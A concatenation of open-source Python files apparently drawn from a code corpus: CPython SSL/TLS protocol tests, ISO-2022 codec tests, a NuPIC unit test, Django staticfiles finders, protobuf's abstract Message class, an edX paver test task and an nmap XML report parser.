try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except (ssl.SSLError, socket.error) as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
# Server with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, True,
client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
wrapped = False
try:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
finally:
server.stop()
server.join()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://%s:%d/%s' % (
HOST, server.port, os.path.split(CERTFILE)[1])
f = urllib.request.urlopen(url)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
finally:
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
server.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
server.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
try:
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
finally:
server.stop()
server.join()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info and support.is_resource_enabled('network'):
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
| apache-2.0 |
sunlianqiang/kbengine | kbe/res/scripts/common/Lib/test/test_codecencodings_iso2022.py | 88 | 1464 | # Codec encoding tests for ISO 2022 encodings.
from test import support
from test import multibytecodec_support
import unittest
COMMON_CODEC_TESTS = (
# invalid bytes
(b'ab\xFFcd', 'replace', 'ab\uFFFDcd'),
(b'ab\x1Bdef', 'replace', 'ab\x1Bdef'),
(b'ab\x1B$def', 'replace', 'ab\uFFFD'),
)
class Test_ISO2022_JP(multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'iso2022_jp'
tstring = multibytecodec_support.load_teststring('iso2022_jp')
codectests = COMMON_CODEC_TESTS + (
(b'ab\x1BNdef', 'replace', 'ab\x1BNdef'),
)
class Test_ISO2022_JP2(multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'iso2022_jp_2'
tstring = multibytecodec_support.load_teststring('iso2022_jp')
codectests = COMMON_CODEC_TESTS + (
(b'ab\x1BNdef', 'replace', 'abdef'),
)
class Test_ISO2022_KR(multibytecodec_support.TestBase, unittest.TestCase):
encoding = 'iso2022_kr'
tstring = multibytecodec_support.load_teststring('iso2022_kr')
codectests = COMMON_CODEC_TESTS + (
(b'ab\x1BNdef', 'replace', 'ab\x1BNdef'),
)
# iso2022_kr.txt cannot be used to test "chunk coding": the escape
# sequence is only written on the first line
@unittest.skip('iso2022_kr.txt cannot be used to test "chunk coding"')
def test_chunkcoding(self):
pass
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
| lgpl-3.0 |
BoltzmannBrain/nupic | tests/unit/nupic/algorithms/fast_cla_classifier_test.py | 35 | 1606 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for the FastCLAClassifier.
This test extends the test for the Python CLAClassifier to ensure that both
classifiers and their tests stay in sync.
"""
import unittest2 as unittest
from nupic.bindings.algorithms import FastCLAClassifier
# Don't import the CLAClassifierTest directly or the unittest.main() will pick
# it up and run it.
import cla_classifier_test
class FastCLAClassifierTest(cla_classifier_test.CLAClassifierTest):
"""Unit tests for FastCLAClassifier class."""
def setUp(self):
self._classifier = FastCLAClassifier
if __name__ == '__main__':
unittest.main()
| agpl-3.0 |
tigersirvine/occtigerscricket | django/contrib/staticfiles/finders.py | 83 | 9624 | import os
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.storage import default_storage, Storage, FileSystemStorage
from django.utils.datastructures import SortedDict
from django.utils.functional import empty, memoize, LazyObject
from django.utils.importlib import import_module
from django.utils._os import safe_join
from django.contrib.staticfiles import utils
from django.contrib.staticfiles.storage import AppStaticStorage
_finders = SortedDict()
class BaseFinder(object):
"""
A base file finder to be used for custom staticfiles finder classes.
"""
def find(self, path, all=False):
"""
Given a relative file path this ought to find an
absolute file path.
If the ``all`` parameter is ``False`` (default) only
the first found file path will be returned; if set
to ``True`` a list of all found files paths is returned.
"""
raise NotImplementedError()
def list(self, ignore_patterns):
"""
Given an optional list of paths to ignore, this should return
a two item iterable consisting of the relative path and storage
instance.
"""
raise NotImplementedError()
class FileSystemFinder(BaseFinder):
"""
A static files finder that uses the ``STATICFILES_DIRS`` setting
to locate files.
"""
def __init__(self, apps=None, *args, **kwargs):
# List of locations with static files
self.locations = []
# Maps dir paths to an appropriate storage instance
self.storages = SortedDict()
if not isinstance(settings.STATICFILES_DIRS, (list, tuple)):
raise ImproperlyConfigured(
"Your STATICFILES_DIRS setting is not a tuple or list; "
"perhaps you forgot a trailing comma?")
for root in settings.STATICFILES_DIRS:
if isinstance(root, (list, tuple)):
prefix, root = root
else:
prefix = ''
if os.path.abspath(settings.STATIC_ROOT) == os.path.abspath(root):
raise ImproperlyConfigured(
"The STATICFILES_DIRS setting should "
"not contain the STATIC_ROOT setting")
if (prefix, root) not in self.locations:
self.locations.append((prefix, root))
for prefix, root in self.locations:
filesystem_storage = FileSystemStorage(location=root)
filesystem_storage.prefix = prefix
self.storages[root] = filesystem_storage
super(FileSystemFinder, self).__init__(*args, **kwargs)
def find(self, path, all=False):
"""
Looks for files in the extra locations
as defined in ``STATICFILES_DIRS``.
"""
matches = []
for prefix, root in self.locations:
matched_path = self.find_location(root, path, prefix)
if matched_path:
if not all:
return matched_path
matches.append(matched_path)
return matches
def find_location(self, root, path, prefix=None):
"""
Finds a requested static file in a location, returning the found
absolute path (or ``None`` if no match).
"""
if prefix:
prefix = '%s%s' % (prefix, os.sep)
if not path.startswith(prefix):
return None
path = path[len(prefix):]
path = safe_join(root, path)
if os.path.exists(path):
return path
def list(self, ignore_patterns):
"""
List all files in all locations.
"""
for prefix, root in self.locations:
storage = self.storages[root]
for path in utils.get_files(storage, ignore_patterns):
yield path, storage
class AppDirectoriesFinder(BaseFinder):
"""
A static files finder that looks in the directory of each app as
specified in the source_dir attribute of the given storage class.
"""
storage_class = AppStaticStorage
def __init__(self, apps=None, *args, **kwargs):
# The list of apps that are handled
self.apps = []
# Mapping of app module paths to storage instances
self.storages = SortedDict()
if apps is None:
apps = settings.INSTALLED_APPS
for app in apps:
app_storage = self.storage_class(app)
if os.path.isdir(app_storage.location):
self.storages[app] = app_storage
if app not in self.apps:
self.apps.append(app)
super(AppDirectoriesFinder, self).__init__(*args, **kwargs)
def list(self, ignore_patterns):
"""
List all files in all app storages.
"""
for storage in self.storages.itervalues():
if storage.exists(''): # check if storage location exists
for path in utils.get_files(storage, ignore_patterns):
yield path, storage
def find(self, path, all=False):
"""
Looks for files in the app directories.
"""
matches = []
for app in self.apps:
match = self.find_in_app(app, path)
if match:
if not all:
return match
matches.append(match)
return matches
def find_in_app(self, app, path):
"""
Find a requested static file in an app's static locations.
"""
storage = self.storages.get(app, None)
if storage:
if storage.prefix:
prefix = '%s%s' % (storage.prefix, os.sep)
if not path.startswith(prefix):
return None
path = path[len(prefix):]
# only try to find a file if the source dir actually exists
if storage.exists(path):
matched_path = storage.path(path)
if matched_path:
return matched_path
class BaseStorageFinder(BaseFinder):
"""
A base static files finder to be used to extended
with an own storage class.
"""
storage = None
def __init__(self, storage=None, *args, **kwargs):
if storage is not None:
self.storage = storage
if self.storage is None:
raise ImproperlyConfigured("The staticfiles storage finder %r "
"doesn't have a storage class "
"assigned." % self.__class__)
# Make sure we have an storage instance here.
if not isinstance(self.storage, (Storage, LazyObject)):
self.storage = self.storage()
super(BaseStorageFinder, self).__init__(*args, **kwargs)
def find(self, path, all=False):
"""
Looks for files in the default file storage, if it's local.
"""
try:
self.storage.path('')
except NotImplementedError:
pass
else:
if self.storage.exists(path):
match = self.storage.path(path)
if all:
match = [match]
return match
return []
def list(self, ignore_patterns):
"""
List all files of the storage.
"""
for path in utils.get_files(self.storage, ignore_patterns):
yield path, self.storage
class DefaultStorageFinder(BaseStorageFinder):
"""
A static files finder that uses the default storage backend.
"""
storage = default_storage
def __init__(self, *args, **kwargs):
super(DefaultStorageFinder, self).__init__(*args, **kwargs)
base_location = getattr(self.storage, 'base_location', empty)
if not base_location:
raise ImproperlyConfigured("The storage backend of the "
"staticfiles finder %r doesn't have "
"a valid location." % self.__class__)
def find(path, all=False):
"""
Find a static file with the given path using all enabled finders.
If ``all`` is ``False`` (default), return the first matching
absolute path (or ``None`` if no match). Otherwise return a list.
"""
matches = []
for finder in get_finders():
result = finder.find(path, all=all)
if not all and result:
return result
if not isinstance(result, (list, tuple)):
result = [result]
matches.extend(result)
if matches:
return matches
# No match.
return all and [] or None
def get_finders():
for finder_path in settings.STATICFILES_FINDERS:
yield get_finder(finder_path)
def _get_finder(import_path):
"""
Imports the staticfiles finder class described by import_path, where
import_path is the full Python path to the class.
"""
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError, e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Finder = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
if not issubclass(Finder, BaseFinder):
raise ImproperlyConfigured('Finder "%s" is not a subclass of "%s"' %
(Finder, BaseFinder))
return Finder()
get_finder = memoize(_get_finder, _finders, 1)
| bsd-3-clause |
gauribhoite/personfinder | env/google_appengine/google/net/proto2/python/public/message.py | 7 | 8376 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Contains an abstract base class for protocol messages."""
class Error(Exception): pass
class DecodeError(Error): pass
class EncodeError(Error): pass
class Message(object):
"""Abstract base class for protocol messages.
Protocol message classes are almost always generated by the protocol
compiler. These generated types subclass Message and implement the methods
shown below.
TODO: Link to an HTML document here.
TODO: Document that instances of this class will also
have an Extensions attribute with __getitem__ and __setitem__.
Again, not sure how to best convey this.
TODO: Document that the class must also have a static
RegisterExtension(extension_field) method.
Not sure how to best express at this point.
"""
__slots__ = []
DESCRIPTOR = None
def __deepcopy__(self, memo=None):
clone = type(self)()
clone.MergeFrom(self)
return clone
def __eq__(self, other_msg):
"""Recursively compares two messages by value and structure."""
raise NotImplementedError
def __ne__(self, other_msg):
return not self == other_msg
def __hash__(self):
raise TypeError('unhashable object')
def __str__(self):
"""Outputs a human-readable representation of the message."""
raise NotImplementedError
def __unicode__(self):
"""Outputs a human-readable representation of the message."""
raise NotImplementedError
def MergeFrom(self, other_msg):
"""Merges the contents of the specified message into current message.
This method merges the contents of the specified message into the current
message. Singular fields that are set in the specified message overwrite
the corresponding fields in the current message. Repeated fields are
appended. Singular sub-messages and groups are recursively merged.
Args:
other_msg: Message to merge into the current message.
"""
raise NotImplementedError
def CopyFrom(self, other_msg):
"""Copies the content of the specified message into the current message.
The method clears the current message and then merges the specified
message using MergeFrom.
Args:
other_msg: Message to copy into the current one.
"""
if self is other_msg:
return
self.Clear()
self.MergeFrom(other_msg)
def Clear(self):
"""Clears all data that was set in the message."""
raise NotImplementedError
def SetInParent(self):
"""Mark this as present in the parent.
This normally happens automatically when you assign a field of a
sub-message, but sometimes you want to make the sub-message
present while keeping it empty. If you find yourself using this,
you may want to reconsider your design."""
raise NotImplementedError
def IsInitialized(self):
"""Checks if the message is initialized.
Returns:
The method returns True if the message is initialized (i.e. all of its
required fields are set).
"""
raise NotImplementedError
def MergeFromString(self, serialized):
"""Merges serialized protocol buffer data into this message.
When we find a field in |serialized| that is already present
in this message:
- If it's a "repeated" field, we append to the end of our list.
- Else, if it's a scalar, we overwrite our field.
- Else, (it's a nonrepeated composite), we recursively merge
into the existing composite.
TODO: Document handling of unknown fields.
Args:
serialized: Any object that allows us to call buffer(serialized)
to access a string of bytes using the buffer interface.
TODO: When we switch to a helper, this will return None.
Returns:
The number of bytes read from |serialized|.
For non-group messages, this will always be len(serialized),
but for messages which are actually groups, this will
generally be less than len(serialized), since we must
stop when we reach an END_GROUP tag. Note that if
we *do* stop because of an END_GROUP tag, the number
of bytes returned does not include the bytes
for the END_GROUP tag information.
"""
raise NotImplementedError
def ParseFromString(self, serialized):
"""Parse serialized protocol buffer data into this message.
Like MergeFromString(), except we clear the object first and
do not return the value that MergeFromString returns.
"""
self.Clear()
self.MergeFromString(serialized)
def SerializeToString(self):
"""Serializes the protocol message to a binary string.
Returns:
A binary string representation of the message if all of the required
fields in the message are set (i.e. the message is initialized).
Raises:
message.EncodeError if the message isn't initialized.
"""
raise NotImplementedError
def SerializePartialToString(self):
"""Serializes the protocol message to a binary string.
This method is similar to SerializeToString but doesn't check if the
message is initialized.
Returns:
A string representation of the partial message.
"""
raise NotImplementedError
def ListFields(self):
"""Returns a list of (FieldDescriptor, value) tuples for all
fields in the message which are not empty. A singular field is non-empty
if HasField() would return true, and a repeated field is non-empty if
it contains at least one element. The fields are ordered by field
number"""
raise NotImplementedError
def HasField(self, field_name):
"""Checks if a certain field is set for the message, or if any field inside
a oneof group is set. Note that if the field_name is not defined in the
message descriptor, ValueError will be raised."""
raise NotImplementedError
def ClearField(self, field_name):
"""Clears the contents of a given field, or the field set inside a oneof
group. If the name neither refers to a defined field or oneof group,
ValueError is raised."""
raise NotImplementedError
def WhichOneof(self, oneof_group):
"""Returns the name of the field that is set inside a oneof group, or
None if no field is set. If no group with the given name exists, ValueError
will be raised."""
raise NotImplementedError
def HasExtension(self, extension_handle):
raise NotImplementedError
def ClearExtension(self, extension_handle):
raise NotImplementedError
def ByteSize(self):
"""Returns the serialized size of this message.
Recursively calls ByteSize() on all contained messages.
"""
raise NotImplementedError
def _SetListener(self, message_listener):
"""Internal method used by the protocol message implementation.
Clients should not call this directly.
Sets a listener that this message will call on certain state transitions.
The purpose of this method is to register back-edges from children to
parents at runtime, for the purpose of setting "has" bits and
byte-size-dirty bits in the parent and ancestor objects whenever a child or
descendant object is modified.
If the client wants to disconnect this Message from the object tree, she
explicitly sets callback to None.
If message_listener is None, unregisters any existing listener. Otherwise,
message_listener must implement the MessageListener interface in
internal/message_listener.py, and we discard any listener registered
via a previous _SetListener() call.
"""
raise NotImplementedError
def __getstate__(self):
"""Support the pickle protocol."""
return dict(serialized=self.SerializePartialToString())
def __setstate__(self, state):
"""Support the pickle protocol."""
self.__init__()
self.ParseFromString(state['serialized'])
| apache-2.0 |
atsolakid/edx-platform | pavelib/acceptance_test.py | 54 | 1985 | """
Acceptance test tasks
"""
from paver.easy import task, cmdopts, needs
from pavelib.utils.test.suites import AcceptanceTestSuite
from optparse import make_option
try:
from pygments.console import colorize
except ImportError:
colorize = lambda color, text: text # pylint: disable=invalid-name
__test__ = False # do not collect
@task
@needs(
'pavelib.prereqs.install_prereqs',
'pavelib.utils.test.utils.clean_reports_dir',
)
@cmdopts([
("system=", "s", "System to act on"),
("default_store=", "m", "Default modulestore to use for course creation"),
("fasttest", "a", "Run without collectstatic"),
("extra_args=", "e", "adds as extra args to the test command"),
make_option("--verbose", action="store_const", const=2, dest="verbosity"),
make_option("-q", "--quiet", action="store_const", const=0, dest="verbosity"),
make_option("-v", "--verbosity", action="count", dest="verbosity"),
make_option("--pdb", action="store_true", help="Launches an interactive debugger upon error"),
])
def test_acceptance(options):
"""
Run the acceptance tests for the either lms or cms
"""
opts = {
'fasttest': getattr(options, 'fasttest', False),
'system': getattr(options, 'system', None),
'default_store': getattr(options, 'default_store', None),
'verbosity': getattr(options, 'verbosity', 3),
'extra_args': getattr(options, 'extra_args', ''),
'pdb': getattr(options, 'pdb', False),
}
if opts['system'] not in ['cms', 'lms']:
msg = colorize(
'red',
'No system specified, running tests for both cms and lms.'
)
print(msg)
if opts['default_store'] not in ['draft', 'split']:
msg = colorize(
'red',
'No modulestore specified, running tests for both draft and split.'
)
print(msg)
suite = AcceptanceTestSuite('{} acceptance'.format(opts['system']), **opts)
suite.run()
| agpl-3.0 |
SECFORCE/sparta | parsers/Parser.py | 1 | 2886 | #!/usr/bin/python
'''this module used to parse nmap xml report'''
__author__ = 'yunshu(wustyunshu@hotmail.com)'
__version__= '0.2'
__modified_by = 'ketchup'
__modified_by = 'SECFORCE'
import parsers.Session as Session
import parsers.Host as Host
import xml.dom.minidom
class Parser:
'''Parser class, parse a xml format nmap report'''
def __init__( self, xml_input ):
'''constructor function, need a xml file name as the argument'''
try:
self.__dom = xml.dom.minidom.parse(xml_input)
self.__session = None
self.__hosts = { }
for host_node in self.__dom.getElementsByTagName('host'):
__host = Host.Host(host_node)
self.__hosts[__host.ip] = __host
except Exception as ex:
print("\t[-] Parser error! Invalid nmap file!")
print(ex)
raise
def get_session( self ):
'''get this scans information, return a Session object'''
run_node = self.__dom.getElementsByTagName('nmaprun')[0]
hosts_node = self.__dom.getElementsByTagName('hosts')[0]
finish_time = self.__dom.getElementsByTagName('finished')[0].getAttribute('timestr')
nmap_version = run_node.getAttribute('version')
start_time = run_node.getAttribute('startstr')
scan_args = run_node.getAttribute('args')
total_hosts = hosts_node.getAttribute('total')
up_hosts = hosts_node.getAttribute('up')
down_hosts = hosts_node.getAttribute('down')
MySession = { 'finish_time': finish_time,
'nmap_version' : nmap_version,
'scan_args' : scan_args,
'start_time' : start_time,
'total_hosts' : total_hosts,
'up_hosts' : up_hosts,
'down_hosts' : down_hosts }
self.__session = Session.Session( MySession )
return self.__session
def get_host( self, ipaddr ):
'''get a Host object by ip address'''
return self.__hosts.get(ipaddr)
def all_hosts( self, status = '' ):
'''get a list of Host object'''
if( status == '' ):
return self.__hosts.values( )
else:
__tmp_hosts = [ ]
for __host in self.__hosts.values( ):
if __host.status == status:
__tmp_hosts.append( __host )
return __tmp_hosts
def all_ips( self, status = '' ):
'''get a list of ip address'''
__tmp_ips = [ ]
if( status == '' ):
for __host in self.__hosts.values( ):
__tmp_ips.append( __host.ip )
else:
for __host in self.__hosts.values( ):
if __host.status == status:
__tmp_ips.append( __host.ip )
return __tmp_ips
| gpl-3.0 |
